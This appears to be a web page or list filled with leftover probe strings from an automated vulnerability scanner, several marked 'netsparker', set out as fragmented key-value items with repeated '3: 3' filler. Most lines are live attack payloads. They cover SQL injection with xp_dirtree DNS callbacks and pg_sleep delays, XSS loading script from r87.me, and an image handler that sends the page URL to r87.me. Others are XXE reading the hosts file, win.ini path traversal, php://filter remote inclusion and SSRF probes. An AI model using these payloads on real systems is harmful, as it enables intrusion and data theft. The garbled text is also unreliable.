  • [php]print(int)0xFFF9999-86753;[/php]:
  • : ns:netsparker056650=vuln
  • 3: 3
  • 3: 3
  • <%a style=x:expre/**/ssion(netsparker(0x06402F))>: 3
  • 3: 3
  • 3: #{28275*28275-(1895)}
  • acmpznnyxl6rlfrqqdjwe4o_urkxlsdktpng0jfjwii.r87.me: 3
  • 3: 3
  • 3: http://r87.com/n?.php
  • exec('xp_dirtree ''\\acmpznnyxl2afjaqy5zx3f-ocedt2vhbibfsofhw'+'zou.r87.me'+'\c$\a'''): 3
  • r87.com/?https://rsalramelan.com/:
  • rsalramelan.com/trace.axd:
  • /../../../../../../../../../../windows/win.ini.php: 3
  • :
  • :
  • [php]print(int)0xFFF9999-90060;[/php]: 3
  • :
  • : NS09?s1?DBL?SNGL?NS09
  • 3: ns:netsparker056650=vuln
  • n;ns:expression(netsparker(0x064052));:
  • :
  • 3: 3
  • '"--></style></scRipt><scRipt src="//acmpznnyxlqevggpvo5p3-mnwzkyfic1za38ezvstm8&#46;r87&#46;me"></scRipt>:
  • //acmpznnyxle3tixacabehiunn6qjhtey7qnuejyhbl4.r87.me:
  • r87.com/?https://rsalramelan.com/: 3
  • : php://filter//resource=http://r87.com/n?.php
  • rsalramelan.com/trace.axd: 3
  • c:\windows\win.ini:
  • 3: 3
  • http://acmpznnyxl1tuv-u_nzljjw6joybnbp-_kcyyxlt_5t.r87.me/p/:
  • 3: 3
  • 3: 3
  • 3: NS09?s1?DBL?SNGL?NS09
  • : http://example.com/? ns: netsparker056650=vuln
  • 3: 3
  • 3: 3
  • n;ns:expression(netsparker(0x064053));: 3
  • gethostbyname(trim('acmpznnyxlvj6mbbjrzm-inlnxrnirtoa-vinhf9'.'74u.r87.me')):
  • '"--></style></scRipt><scRipt src="//acmpznnyxlzt-bjnp3nfe5cwunustcpxtptthvi6xss&#46;r87&#46;me"></scRipt>: 3
  • //acmpznnyxl4_tg_r3hlnolhvqcthjx732aylzlycqgw.r87.me: 3
  • /\r87.com/?rsalramelan.com/:
  • 3: php://filter//resource=http://r87.com/n?.php
  • 36.91.147.95/trace.axd:
  • http://acmpznnyxlgmnht0sr6swkr6dqayuxaavacfmd3csbh.r87.me/p/: 3
  • c:\windows\win.ini: 3
  • :
  • :
  • :
  • 3: 3
  • 000177.000.00000.000001/trace.axd:
  • 3: http://example.com/? ns: netsparker056650=vuln
  • gethostbyname(trim('acmpznnyxltrqg6rsaewrpvdpqolxnuoi-nfrvze'.'g0q.r87.me')): 3
  • :
  • body{x:expression(netsparker(0x064056))}:
  • <iMg src=N onerror="this.onerror='';this.src='//acmpznnyxlkcdscrhxk9b_b9yarndk6i7qlwpzi-'+'xci.r87.me/r/?'+location.href">:
  • 1;exec('xp_dirtree ''\\acmpznnyxlwtfqrcfsx_croqiy2fsfsvd1owwfnh'+'ity.r87.me'+'\c$\a''')--:
  • : r87.com/n
  • php://filter//resource=http://acmpznnyxlhobislfepi_jxemrxagr8cp2lexv-hpst.r87.me/p/:
  • /\r87.com/?rsalramelan.com/: 3
  • http://r87.me/r/?id=acmpznnyxl-oqirmd90nbvgrlcolcohkkmtb-w-i1mk:
  • 36.91.147.95/trace.axd: 3
  • ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini:
  • 3: 3
  • 3: 3
  • print localtime()*0+0xFFF9999-90551:
  • 0177.0.0.1/trace.axd:
  • 3: 3
  • 3: 3
  • : ns:netsparker056650=vuln
  • gethostbyname(trim('acmpznnyxlqsa4yg5ef-f8djcfiwpqoml2g4iczx'.'ofe.r87.me'));:
  • 3: 3
  • body{x:expression(netsparker(0x064057))}: 3
  • <iMg src=N onerror="this.onerror='';this.src='//acmpznnyxl0ivrf-chpn0amd3ycrm76sysacydb-'+'9lw.r87.me/r/?'+location.href">: 3
  • 1;exec('xp_dirtree ''\\acmpznnyxlr-39ud7wdsaqaxfcrgogkx0vqflw2h'+'v_4.r87.me'+'\c$\a''')--: 3
  • php://filter//resource=http://acmpznnyxlnbussgxz0wb1rkvrh6oq4pvz-jyuuqdkt.r87.me/p/: 3
  • 1';SELECT pg_sleep(25)--:
  • 3: r87.com/n
  • ///r87.com/?rsalramelan.com/:
  • 127.100.11.2/trace.axd:
  • http://r87.me/r/?id=acmpznnyxlhb-1gvrnwn80gveyotiq6gvwzfo3v7jlm: 3
  • ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini: 3
  • 0177.0.1/trace.axd:
  • :
  • :
  • : <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>
  • 3: 3
  • print localtime()*0+0xFFF9999-66089: 3
  • gethostbyname(trim('acmpznnyxlbv0upl9addcjf1-vl9ygu8iolz-utq'.'3_k.r87.me'));: 3
  • 3: ns:netsparker056650=vuln
  • -1';exec('xp_dirtree ''\\acmpznnyxlwjwmlhordhwo_mrr7c4x-5uvrwqp3f'+'x-e.r87.me'+'\c$\a''')--:
  • :
  • */netsparker(0x06405C);/*:
  • acmpznnyxlpp5ba2ploekosnxihrgkjvhhahpyowvxl.r87.me/p/:
  • 1';SELECT pg_sleep(25)--: 3
  • ///r87.com/?rsalramelan.com/: 3
  • :
  • 127.100.11.2/trace.axd: 3
  • 0177.1/trace.axd:
  • 3: 3
  • ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini:
  • 3: 3
  • 3: <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>
  • 3: 3
  • +gethostbyname(trim('acmpznnyxlv8ijrx8jmfvsnkeqzwq-1-u7rn3bnm'.'jqg.r87.me'));//:
  • eval('print localtime()*0+0xFFF9999-72661'):
  • : ns:netsparker056650=vuln